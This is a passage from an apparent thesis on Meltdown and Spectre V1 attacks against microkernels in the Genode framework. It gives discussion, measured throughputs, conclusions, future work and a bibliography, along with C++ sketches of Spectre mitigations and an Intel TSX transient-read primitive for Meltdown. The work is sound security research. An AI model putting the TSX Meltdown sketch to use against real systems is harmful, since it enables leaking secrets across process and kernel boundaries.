The subject of microarchitectural attacks, Spectre and Meltdown in particular, has received much attention since the work of Kocher et al. [24] and Lipp et al. [31]. This is no surprise, as Lipp et al. showed that the Meltdown attack can dump memory from a victim process, demonstrating this on Firefox. Similarly, Kocher et al. showed that a Spectre attack can be used to leak host memory from within a virtualized environment. Since then, several others have contributed to these types of attacks. As brought up by Mcilroy et al. [33], microarchitectural attacks are not easily resolved and are a bigger problem than previously anticipated. Mcilroy et al. found abstractions to be an issue; that is, our view of how the CPU functions is overly simplified, and knowledgeable attackers may exploit this fact, especially in the pursuit of uncompromising performance. In these abstractions, microarchitectural state has been assumed unobservable. Although CPUs become faster, they also become more complex; with this complexity comes a security cost and likely more complexity to address security issues. Microkernels are certainly an approach to reducing the complexity of the core kernel, but the kernel's separation is threatened if user processes can bypass the kernel's barriers.

5.5.1 Can OS Memory Separation be Trusted?
As brought up by Mcilroy et al. [33], OS memory separation can be of great use, since user-process separation cannot guarantee separation when hardware is untrusted. Additional separation enforced by the OS may be of some help: if not against Spectre, it definitively protects against the workings of Meltdown. Microkernels may not by definition mitigate Meltdown, but may keep less exploitable information available to Meltdown. Furthermore, there is little to indicate that microkernels help with respect to Spectre. There are mitigations for variations of Spectre, but new versions of the attack such as NetSpectre [42] and SpectreRSB [25] indicate that the problem may be bigger than anticipated. However, something which may prove in favor of microkernels is their small code size, which may make analysis against microarchitectural attacks easier. Still, the problem remains, as much of the issue is closely related to the workings of the hardware.

5.5.2 Can Hardware Separation be Trusted?
The scope of Spectre attacks is likely more widespread than anticipated, as Mcilroy et al. stated [33]. Although Koruyeh et al. [25] were not successful in demonstrating SpectreRSB on ARM and AMD CPUs, these CPUs also utilize an RSB. Thus, there may be interest in investigating possibilities to utilize SCAs to violate the ARM Trustzone use-cases for Genode. It is likely that some use-cases are vulnerable to SCAs, as Bukasa et al. [3] demonstrated that the ARM Trustzone is ineffective at preventing power-analysis SCAs, and Lapid and Wool [29] mounted a side-channel cache attack against the ARM32 AES implementation.

5.5.3 Consequences for Security and Safety Critical Systems

The presence of microarchitectural attacks may compromise claims of security against certain types of attacks. Still, a secure design may retain valuable guarantees against other types of attacks. Some value also lies in the fact that microarchitectural attacks are not trivial to construct and in many cases require execution privileges on the device. However, the difficulty of executing the attacks may change, and local execution privileges may not remain a requirement, as shown by Schwarz et al. with NetSpectre [42] and Lipp et al. with Nethammer [30]. For very safety- or security-critical applications, such as medical devices and vehicular communications, using specialized hardware which is not affected by known attacks needs to be considered.


5.5.4 Impact of This Work

Microarchitectural attacks do pose a threat to privacy and security, as demonstrated by several works [31]2. This work demonstrates that efforts to obtain a truly secure kernel using Genode are not without security flaws; the kernel may still be vulnerable to microarchitectural attacks. Consequently, high-assurance applications can still not give absolute guarantees. There is a need for awareness of microarchitectural attacks and possibly for mitigations. In the case demonstrated in this thesis, countermeasures can be put in place to secure communication mechanisms against Spectre V1.

2J. Corbet. Meltdown/Spectre mitigation for 4.15 and beyond [LWN.net]. Jan. 2018. URL: https://lwn.net/Articles/744287/ (visited on 2019-03-25).

6 Conclusion

In this thesis we have examined the vulnerability of microkernels with respect to the microarchitectural attacks Meltdown and Spectre V1. Furthermore, the performance impact of Spectre V1 mitigations was examined. The targeted kernels were the microkernels Okl4 and Nova, with Linux included for comparison. These kernels were run within the Genode OS framework for evaluation. The successful Meltdown implementation required Intel TSX, as suppressing a segmentation fault was otherwise not an option. Another design based on spawning processes may prove successful but incurs extra runtime costs; no successful results were produced with such a design.

• Can Flush+Reload be used to create a covert channel between two processes in Genode, measured as the throughput of the demonstrated channel? A covert Flush+Reload channel was demonstrated in Genode with a throughput of 36 Bps on Okl4, 44 Bps on Nova and 13409 Bps on Linux. The large discrepancy between Linux and the microkernels was deemed likely to stem from scheduling differences.

• Are the RPC mechanisms in the microkernels Nova and Okl4 vulnerable to Spectre, measured as the throughput of the demonstrated attack? The microkernels were determined to be vulnerable to Spectre V1, and a POC was produced with a throughput of 1029 Bps on Okl4, 1760 Bps on Nova and 525 Bps on Linux.

• Can the Meltdown attack be executed on Genode? Results regarding the microkernels' vulnerability to Meltdown are inconclusive. However, an attack reading the secret of another process in Genode running on Linux was demonstrated with a throughput of 11070 Bps.

• What is the performance impact of Spectre V1 mitigation alternatives, measured as the relative slowdown of RPC mechanisms? The Spectre mitigations of bitmasking and instruction-stream serialization were evaluated, yielding relative slowdowns of 3% for serialization and 4% for bitmasking, see Tables 4.14 and 4.15. A sketch of both mitigations is given after this list.
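To illustrate what the two mitigation alternatives look like in code, the following C++ sketch applies them to a generic bounds-checked array access. This is our own illustration and not the RPC code that was benchmarked; table, read_serialized, index_mask and read_masked are hypothetical names, and the branch-free mask follows the same idea as the Linux kernel's generic array_index_nospec fallback.

#include <cstddef>
#include <cstdint>
#include <type_traits>
#include <emmintrin.h>   // _mm_lfence

static std::uint8_t table[16];   // hypothetical bounds-checked array

// Mitigation 1: instruction-stream serialization. The lfence acts as a
// speculation barrier, so the load cannot execute before the bounds check
// has been resolved.
std::uint8_t read_serialized(std::size_t index, std::size_t size)
{
    if (index < size) {
        _mm_lfence();
        return table[index];
    }
    return 0;
}

// Branch-free mask: all ones when index < size, zero otherwise. Assumes
// arithmetic right shift of signed values, as provided by GCC and Clang
// on x86-64.
static inline std::size_t index_mask(std::size_t index, std::size_t size)
{
    using S = std::make_signed_t<std::size_t>;
    return static_cast<std::size_t>(
        ~static_cast<S>(index | (size - index - 1)) >> (sizeof(std::size_t) * 8 - 1));
}

// Mitigation 2: bitmasking. Even if the branch is mis-speculated, the masked
// index collapses to zero, so the transient load stays inside the array.
std::uint8_t read_masked(std::size_t index, std::size_t size)
{
    if (index < size)
        return table[index & index_mask(index, size)];
    return 0;
}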

It was determined that microkernels and Genode are not secure by design against microarchitectural attacks. This has been demonstrated by the Spectre V1 attack with a throughput on the order of 1 kB/s and the Meltdown attack with a throughput on the order of 10 kB/s. Microkernels do have some benefits with regard to mitigating Meltdown, as several kernels do not map kernel space into user space and are consequently only affected by Meltdown in a limited way. In addition, Genode does not support custom segmentation fault handlers. Consequently, the Meltdown attack requires another recovery mechanism; one viable option is Intel TSX, as sketched below.
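As an illustration of how Intel TSX can serve as that recovery mechanism, the following C++ sketch wraps the transient read in a transaction so that the faulting access aborts the transaction instead of raising a segmentation fault. It is a minimal sketch under stated assumptions rather than the exact code used in the thesis: probe_array, transient_read, the 256-entry layout and the page-sized stride follow the public Meltdown POCs, and compilation requires RTM support (e.g. -mrtm with GCC).

#include <cstddef>
#include <cstdint>
#include <immintrin.h>   // _xbegin, _xend, _XBEGIN_STARTED

// Hypothetical Flush+Reload probe array: one page-sized slot per byte value.
alignas(4096) static volatile std::uint8_t probe_array[256 * 4096];

// One transient-read attempt against an inaccessible address. The faulting
// load aborts the TSX transaction instead of delivering a segmentation fault,
// so no custom fault handler is needed. If the transient instructions ran,
// the secret byte is encoded as a cached line of probe_array and can be
// recovered afterwards with Flush+Reload.
inline void transient_read(const volatile std::uint8_t* inaccessible_addr)
{
    if (_xbegin() == _XBEGIN_STARTED) {
        const std::uint8_t secret = *inaccessible_addr;               // faults, aborts the transaction
        (void)probe_array[static_cast<std::size_t>(secret) * 4096];   // leaves a secret-dependent cache trace
        _xend();                                                      // not reached when the transaction aborts
    }
    // Execution resumes here after the abort; probe_array is then measured
    // with Flush+Reload to determine which line was loaded.
}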

6.1 Future Work

For future work, the most obvious next step is to determine a target for the Meltdown attack against the microkernels in Genode and rigorously attack those targeted addresses. It may also be interesting to pursue another segmentation fault recovery design, since Intel TSX is only present on some Intel CPUs [20]. With respect to Spectre V1, it may be interesting to target existing Genode components which expose vulnerable RPCs, or to implement other Spectre variants which use different techniques, such as variants 2 and 3 or SpectreRSB [24, 25]. Trying these different variants can further establish the scope of Spectre's impact on microkernels.

Bibliography

[1] T. Brito, N. O. Duarte, and N. Santos. “ARM TrustZone for Secure Image Processing on the Cloud”. In: IEEE 35th Symposium on Reliable Distributed Systems Workshops (SRDSW). Sept. 2016, pp. 37–42. DOI: 10.1109/SRDSW.2016.17.
[2] D. Brumley and D. Boneh. “Remote Timing Attacks Are Practical”. In: Proceedings of the 12th Conference on USENIX Security Symposium. SSYM. event-place: Washington, DC. USENIX Association, 2003.
[3] S. K. Bukasa, R. Lashermes, H. Le Bouder, J. Lanet, and A. Legay. “How TrustZone Could Be Bypassed: Side-Channel Attacks on a Modern System-on-Chip”. en. In: Information Security Theory and Practice. Ed. by G.P. Hancke and E. Damiani. Vol. 10741. Cham: Springer International Publishing, 2018, pp. 93–109. ISBN: 978-3-319-93523-2 978-3-319-93524-9. DOI: 10.1007/978-3-319-93524-9_6.
[4] cgroups(7) - Linux manual page. URL: http://man7.org/linux/man-pages/man7/cgroups.7.html (visited on 2019-02-21).
[5] S. Constable, A. Sahebolamri, and S. Chapin. “Extending seL4 Integrity to the Genode OS Framework”. In: (2017).
[6] J. Corbet and G. Kroah-Hartman. “Linux Kernel Development How Fast It is Going, Who is Doing It, What They Are Doing and Who is Sponsoring the Work”. In: (2016), p. 18. URL: http://go.linuxfoundation.org/l/6342/el-Development-Report-2016-pdf/3vr4pg.
[7] N. Feske. Foundations: GENODE Operating System Framework 18.05. GENODE LABS, 2018. URL: https://genode.org/documentation/genode-foundations-18-05.pdf.
[8] Q. Ge, Y. Yarom, D. Cock, and G. Heiser. “A survey of microarchitectural timing attacks and countermeasures on contemporary hardware”. In: Journal of Cryptographic Engineering 8.1 (Apr. 2018), pp. 1–27. ISSN: 2190-8508, 2190-8516. DOI: 10.1007/s13389-016-0141-6.
[9] D. Gens, O. Arias, D. Sullivan, C. Liebchen, Y. Jin, and A. R. Sadeghi. “LAZARUS: Practical Side-Channel Resilient Kernel-Space Randomization”. In: Research in Attacks, Intrusions, and Defenses. Ed. by M. Dacier, M. Bailey, M. Polychronakis, and M. Antonakakis. Springer International Publishing, 2017, pp. 238–258. ISBN: 978-3-319-66332-6.


[10] D. Gruss, R. Spreitzer, and S. Mangard. “Cache Template Attacks: Automating Attacks on Inclusive Last-level Caches”. In: Proceedings of the 24th USENIX Conference on Security Symposium. SEC. event-place: Washington, D.C. USENIX Association, 2015, pp. 897–912. ISBN: 978-1-931971-23-2.
[11] D. Gullasch, E. Bangerter, and S. Krenn. “Cache Games – Bringing Access-Based Cache Attacks on AES to Practice”. In: IEEE Symposium on Security and Privacy. IEEE, May 2011, pp. 490–505. ISBN: 978-1-4577-0147-4. DOI: 10.1109/SP.2011.22.
[12] M. Hamad, M. Nolte, and V. Prevelakis. “A framework for policy based secure intra vehicle communication”. In: 2017 IEEE Vehicular Networking Conference (VNC). Nov. 2017, pp. 1–8. DOI: 10.1109/VNC.2017.8275646.
[13] M. Hamad and V. Prevelakis. “Implementation and performance evaluation of embedded IPsec in microkernel OS”. In: World Symposium on Computer Networks and Information Security (WSCNIS). Sept. 2015, pp. 1–7. DOI: 10.1109/WSCNIS.2015.7368294.
[14] S. Harp, T. Carpenter, and J. Hatcliff. “A Reference Architecture for Secure Medical Devices”. In: Biomedical Instrumentation & Technology 52.5 (Sept. 2018), pp. 357–365. ISSN: 0899-8205. DOI: 10.2345/0899-8205-52.5.357.
[15] U. Drepper, Red Hat. “What Every Programmer Should Know About Memory”. In: (2007), p. 114.
[16] C. Hawblitzel, J. Howell, J. R. Lorch, A. Narayan, B. Parno, D. Zhang, and B. Zill. “Ironclad Apps: End-to-end Security via Automated Full-System Verification”. en. In: Proceedings of the 11th USENIX conference on Operating Systems Design and Implementation. 2014, p. 18. ISBN: 978-1-931971-16-4.
[17] P. K. Immich, R. S. Bhagavatula, and R. Pendse. “Performance analysis of five interprocess communication mechanisms across UNIX operating systems.” In: The Journal of Systems & Software 68 (2003), pp. 27–43. ISSN: 0164-1212. DOI: 10.1016/S0164-1212(02)00134-6.
[18] Intel Corporation. “Intel Analysis of Speculative Execution Side Channels”. en. In: (2018), p. 12.
[19] Intel Corporation. “Intel® 64 and IA-32 Architectures Optimization Reference Manual”. en. In: (2016), p. 672.
[20] Intel Corporation. “Intel® 64 and IA-32 Architectures Software Developer’s Manual Documentation Changes”. en. In: (Sept. 2016), p. 1299.
[21] G. Irazoqui, T. Eisenbarth, and B. Sunar. “S$A: A Shared Cache Attack That Works across Cores and Defies VM Sandboxing – and Its Application to AES”. In: IEEE Symposium on Security and Privacy. 2015, pp. 591–604. DOI: 10.1109/SP.2015.42.
[22] V. Kiriansky and C. Waldspurger. “Speculative Buffer Overflows: Attacks and Defenses”. en. In: (July 2018).
[23] G. Klein, K. Elphinstone, G. Heiser, J. Andronick, D. Cock, P. Derrin, D. Elkaduwe, K. Engelhardt, R. Kolanski, M. Norrish, T. Sewell, H. Tuch, and S. Winwood. “seL4: Formal Verification of an OS Kernel”. In: 22nd Symposium on Operating Systems Principles (SOSP). ACM, 2009, pp. 207–220. ISBN: 978-1-60558-752-3. DOI: 10.1145/1629575.1629596.
[24] P. Kocher, J. Horn, A. Fogh, D. Genkin, D. Gruss, W. Haas, M. Hamburg, M. Lipp, S. Mangard, T. Prescher, M. Schwarz, and Y. Yarom. “Spectre Attacks: Exploiting Speculative Execution”. In: 40th IEEE Symposium on Security and Privacy (S&P). 2019.
[25] E. M. Koruyeh, K. N. Khasawneh, C. Song, and N. Abu-Ghazaleh. “Spectre Returns! Speculation Attacks using the Return Stack Buffer”. In: 12th Workshop on Offensive Technologies (WOOT) (2018), p. 12.


[26] C. Lameter. “Extreme high performance computing or why microkernels suck”. In: Proceedings of the Ottawa Linux Symposium. 2007.
[27] B. W. Lampson. “A Note on the Confinement Problem”. In: Commun. ACM 16.10 (Oct. 1973), pp. 613–615. ISSN: 0001-0782. DOI: 10.1145/362375.362389.
[28] M. Lange, S. Liebergeld, A. Lackorzynski, A. Warg, and M. Peter. “L4Android: A Generic Operating System Framework for Secure Smartphones”. In: Proceedings of the 1st ACM Workshop on Security and Privacy in Smartphones and Mobile Devices. SPSM. ACM, 2011, pp. 39–50. ISBN: 978-1-4503-1000-0. DOI: 10.1145/2046614.2046623.
[29] B. Lapid and A. Wool. “Cache-Attacks on the ARM TrustZone Implementations of AES-256 and AES-256-GCM via GPU-Based Analysis”. In: Selected Areas in Cryptography (SAC). Ed. by C. Cid and M. J. Jacobson. Vol. 11349. 2019, pp. 235–256. ISBN: 978-3-030-10969-1 978-3-030-10970-7. DOI: 10.1007/978-3-030-10970-7_11.
[30] M. Lipp, M. T. Aga, M. Schwarz, D. Gruss, C. Maurice, L. Raab, and L. Lamster. “Nethammer: Inducing Rowhammer Faults through Network Requests”. In: CoRR abs/1805.04956 (May 2018).
[31] M. Lipp, M. Schwarz, D. Gruss, T. Prescher, W. Haas, A. Fogh, J. Horn, S. Mangard, P. Kocher, D. Genkin, Y. Yarom, and M. Hamburg. “Meltdown: Reading Kernel Memory from User Space”. In: 27th USENIX Security Symposium. 2018.
[32] F. Liu, Y. Yarom, Q. Ge, G. Heiser, and R. B. Lee. “Last-Level Cache Side-Channel Attacks are Practical”. In: IEEE Symposium on Security and Privacy. IEEE, May 2015, pp. 605–622. ISBN: 978-1-4673-6949-7. DOI: 10.1109/SP.2015.43.
[33] R. Mcilroy, J. Sevcik, T. Tebbi, B. L. Titzer, and T. Verwaest. “Spectre is here to stay: An analysis of side-channels and speculative execution”. In: CoRR abs/1902.05178 (Feb. 2019). arXiv: 1902.05178.
[34] G. Paoloni. How to Benchmark Code Execution Times on Intel IA-32 and IA-64 Instruction Set Architectures. Sept. 2010.
[35] P. Pessl, D. Gruss, C. Maurice, M. Schwarz, and S. Mangard. “DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks”. en. In: 2016, pp. 565–581.
[36] A. Prout, W. Arcand, D. Bestor, B. Bergeron, C. Byun, V. Gadepally, M. Houle, M. Hubbell, M. Jones, A. Klein, P. Michaleas, L. Milechin, J. Mullen, A. Rosa, S. Samsi, C. Yee, A. Reuther, and J. Kepner. “Measuring the Impact of Spectre and Meltdown”. In: IEEE High Performance extreme Computing Conference (HPEC). Sept. 2018, pp. 1–5. DOI: 10.1109/HPEC.2018.8547554.
[37] J. R. Ramos. “TrustFrame, a Software Development Framework for TrustZone-enabled Hardware”. en. PhD thesis. Tecnico Ulisboa, Nov. 2016.
[38] P. S. Ribeiro, N. Santos, and N. O. Duarte. “DBStore: A TrustZone-backed Database Management System for Mobile Applications”. en. In: (2018), p. 8. DOI: 10.5220/0006883603960403.
[39] W. Schmidt, M. Hanspach, and J. Keller. “A Case Study on Covert Channel Establishment via Software Caches in High-Assurance Computing Systems”. In: (Aug. 2015).
[40] M. Schwarz, M. Lipp, D. Moghimi, J. V. Bulck, J. Stecklina, T. Prescher, and D. Gruss. “ZombieLoad: Cross-Privilege-Boundary Data Sampling”. en. In: (May 2019), p. 15.
[41] M. Schwarz, C. Maurice, D. Gruss, and S. Mangard. “Fantastic Timers and Where to Find Them: High-Resolution Microarchitectural Attacks in JavaScript”. en. In: Financial Cryptography and Data Security. Lecture Notes in Computer Science. Springer International Publishing, 2017, pp. 247–267. ISBN: 978-3-319-70972-7.


[42] M. Schwarz, M. Schwarzl, M. Lipp, and D. Gruss. “NetSpectre: Read Arbitrary Memory over Network”. In: CoRR abs/1807.10535 (2018).
[43] B. Stuart. “Current state of mitigations for Spectre within operating systems”. In: Proceedings of Workshop on Advanced Microkernel Operating Systems (WAMOS) (2018), p. 5.
[44] A. Thongthua and S. Ngamsuriyaroj. “Assessment of Hypervisor Vulnerabilities.” In: International Conference on Cloud Computing Research and Innovations (ICCCRI) (2016), p. 71. ISBN: 978-1-5090-3951-7. DOI: 10.1109/ICCCRI.2016.19.
[45] C. Trippel, D. Lustig, and M. Martonosi. “MeltdownPrime and SpectrePrime: Automatically-Synthesized Attacks Exploiting Invalidation-Based Coherence Protocols”. In: CoRR abs/1802.03802 (2018).
[46] D. Waddington, J. Colmenares, J. Kuang, and F. Song. “KV-Cache: A Scalable High-Performance Web-Object Cache for Manycore”. en. In: IEEE/ACM 6th International Conference on Utility and Cloud Computing. IEEE, Dec. 2013, pp. 123–130. ISBN: 978-0-7695-5152-4. DOI: 10.1109/UCC.2013.34.
[47] Y. Xiao, X. Zhang, Y. Zhang, and R. Teodorescu. “One Bit Flips, One Cloud Flops: Cross-VM Row Hammer Attacks and Privilege Escalation”. en. In: USENIX Association, 2016, pp. 19–35. ISBN: 978-1-931971-32-4.
[48] Y. Yarom and K. Falkner. “Flush+Reload: A High Resolution, Low Noise, L3 Cache Side-Channel Attack”. en. In: 23rd USENIX Security Symposium. The USENIX Association, 2014. ISBN: 978-1-931971-15-7.
[49] Z. Yu, C. Yuan, X. Wei, Y. Gao, and L. Wang. “Message-passing interprocess communication design in seL4”. In: 5th International Conference on Computer Science and Network Technology (ICCSNT). Dec. 2016, pp. 418–422. DOI: 10.1109/ICCSNT.2016.8070192.
[50] P. Zhou, T. Wang, G. Li, F. Zhang, and X. Zhao. “Analysis on the parameter selection method for FLUSH+RELOAD based cache timing attack on RSA”. In: China Communications 12.6 (June 2015), pp. 33–45. ISSN: 1673-5447. DOI: 10.1109/CC.2015.7122479.
